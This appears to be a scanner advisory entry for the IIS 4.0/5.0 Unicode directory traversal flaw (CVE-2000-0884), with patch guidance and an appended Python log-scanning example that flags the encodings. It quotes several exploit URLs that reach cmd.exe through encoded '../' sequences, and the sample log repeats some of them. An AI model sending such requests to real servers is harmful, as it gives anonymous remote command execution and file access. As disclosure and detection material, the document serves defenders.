| VID | 22103 |
| Severity | 40 |
| Port | 80, … |
| Protocol | TCP |
| Class | WWW |
| Detailed Description |
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\".
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default; therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would give a remote user possessing no credentials whatsoever the same privileges as a user who could successfully log on to the system. An anonymous person posts that they can run arbitrary commands on IIS 4.0/5.0 using the following URLs:
http://target.server/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
* References: http://technet.microsoft.com/en-us/security/bulletin/ms00-078 |
| Recommendation |
The patch released with the advisory MS00-057 (http://www.microsoft.com/technet/security/bulletin/ms00-057.asp) eliminates this vulnerability; therefore, those who have already applied this patch do not have to take any further action. Otherwise, the patch is available at the following locations:
IIS 4.0 http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
IIS 5.0 http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp |
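
For reviewing request logs on servers whose patch status is not yet confirmed, the following added example (not part of the original advisory or of any vendor tool) flags request paths that carry the encodings described above. The function names, the reason labels and the simplified log format are assumptions made for illustration, and the check covers the overlong and malformed %c0/%c1 forms only, not the %d0%af variant.

```python
import re
from urllib.parse import unquote_to_bytes

TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")

def lenient_decode(data: bytes) -> str:
    """Decode 2-byte UTF-8 without rejecting overlong forms (non-strict decoder)."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data) and data[i + 1] & 0xC0 == 0x80:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)

def inspect_path(raw_path: str) -> list:
    """Return the reasons a request path should be flagged (empty list if none)."""
    decoded = unquote_to_bytes(raw_path)   # malformed escapes such as %9v stay as-is
    reasons = []
    # 0xC0/0xC1 can only begin an overlong encoding of an ASCII character.
    if 0xC0 in decoded or 0xC1 in decoded:
        reasons.append("overlong-lead-byte")
    try:
        decoded.decode("utf-8")            # a strict decoder rejects overlong forms
    except UnicodeDecodeError:
        reasons.append("invalid-utf8")
    # A "../" that appears only after non-strict decoding was hidden from path checks.
    if TRAVERSAL.search(lenient_decode(decoded)) and not TRAVERSAL.search(raw_path):
        reasons.append("hidden-traversal")
    return reasons

# Constructed sample lines in a simplified "date time client method path" format.
SAMPLE_LOG = [
    "2000-10-20 10:00:01 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe",
    "2000-10-20 10:00:02 192.0.2.10 GET /scripts/..%c1%9c../winnt/system32/cmd.exe",
    "2000-10-20 10:00:03 192.0.2.10 GET /scripts/..%c0%9v../winnt/system32/cmd.exe",
    "2000-10-20 10:00:04 198.51.100.7 GET /images/caf%c3%a9.gif",
]

def scan(lines):
    hits = []
    for line in lines:
        fields = line.split()
        reasons = inspect_path(fields[4])
        if reasons:
            hits.append((fields[2], fields[4], reasons))
    return hits
```

Calling `scan(SAMPLE_LOG)` returns the three `/scripts/` requests and leaves the legitimately encoded `caf%c3%a9.gif` request unflagged.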
| Related URL | CVE-2000-0884 (CVE) |
| Related URL | (SecurityFocus) |
| Related URL | (ISS) |